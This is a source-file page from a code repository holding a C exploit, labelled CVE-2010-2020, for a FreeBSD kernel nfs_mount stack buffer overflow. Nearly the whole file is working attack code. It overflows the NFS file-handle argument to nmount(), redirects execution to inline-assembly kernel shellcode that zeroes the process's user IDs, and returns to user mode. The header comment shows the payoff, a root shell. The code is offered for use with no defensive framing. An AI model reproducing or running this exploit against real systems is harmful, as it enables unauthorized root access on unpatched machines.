-
Notifications
You must be signed in to change notification settings - Fork 50
/
nfs_mount.c
115 lines (92 loc) · 3.05 KB
/
nfs_mount.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
/* nfs_exp.c - CVE: 2010-2020 Freebsd kernel nfs_mount stack buffer overflow exploit.
*
* by wzt http://www.cloud-sec.org
*
* $ ./nfs_exp
* [+] trigger nmount() ...
* Segmentation fault (core dumped)
* $ id
* uid=0(root) gid=0(wheel) egid=1001(wzt) groups=1001(wzt)
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/mount.h>
#include <sys/uio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <nfsclient/nfsargs.h>
#include <errno.h>
#define NFS_ARGSVERSION 3
#define OFFSET 272
#define FSNAME "nfs"
#define FAKE_PATH "/tmp/nfs"
#define CS 0x33
#define SS 0X3b
#define EFLAGS 0x246
#define USER_STACK(x) (x + sizeof(x))
char stack[4096 * 1024];
void exit_user_code(void);
void kernel_shellcode(void)
{
asm("movl %%fs:0, %%eax\n\t"
"movl 0x4(%%eax), %%eax\n\t"
"movl 0x30(%%eax), %%eax\n\t"
"xorl %%ecx, %%ecx\n\t"
"movl %%ecx, 0x4(%%eax)\n\t"
"movl %%ecx, 0x8(%%eax)\n\t"
"pop %%ebp\n\t"
"movl %0, 0x10(%%esp)\n\t"
"movl %1, 0xc(%%esp)\n\t"
"movl %2, 0x8(%%esp)\n\t"
"movl %3, 0x4(%%esp)\n\t"
"movl %4, 0x0(%%esp)\n\t"
"iret"
::"r"(SS), "r"(USER_STACK(stack)), "r"(EFLAGS), "r"(CS), "r"(exit_user_code));
}
void exit_user_code(void)
{
printf("[+] exploit success!\n");
}
void trigger(void)
{
struct nfs_args fake_na;
struct iovec fake_iov[6];
fake_na.fh = (char *)malloc(OFFSET);
if (!fake_na.fh)
return ;
memset(fake_na.fh, 'A', OFFSET);
fake_na.fhsize = OFFSET;
fake_na.version = NFS_ARGSVERSION;
*(unsigned int *)(fake_na.fh + OFFSET - 4) = (unsigned int)kernel_shellcode;
mkdir(FAKE_PATH, 0777);
fake_iov[0].iov_base = "fstype";
fake_iov[0].iov_len = strlen(fake_iov[0].iov_base) + 1;
fake_iov[1].iov_base = FSNAME;
fake_iov[1].iov_len = strlen(fake_iov[1].iov_base) + 1;
fake_iov[2].iov_base = "fspath";
fake_iov[2].iov_len = strlen(fake_iov[2].iov_base) + 1;
fake_iov[3].iov_base = FAKE_PATH;
fake_iov[3].iov_len = strlen(fake_iov[3].iov_base) + 1;
fake_iov[4].iov_base = "nfs_args";
fake_iov[4].iov_len = strlen(fake_iov[4].iov_base) + 1;
fake_iov[5].iov_base = &fake_na;
fake_iov[5].iov_len = sizeof(fake_na);
printf("[+] trigger nmount() ...\n");
if (nmount(fake_iov, 6, 0) < 0) {
printf("[-] exploit failed.\n");
free(fake_na.fh);
return ;
}
unmount(FAKE_PATH, 0);
rmdir(FAKE_PATH);
free(fake_na.fh);
}
int main(void)
{
trigger();
return 0;
}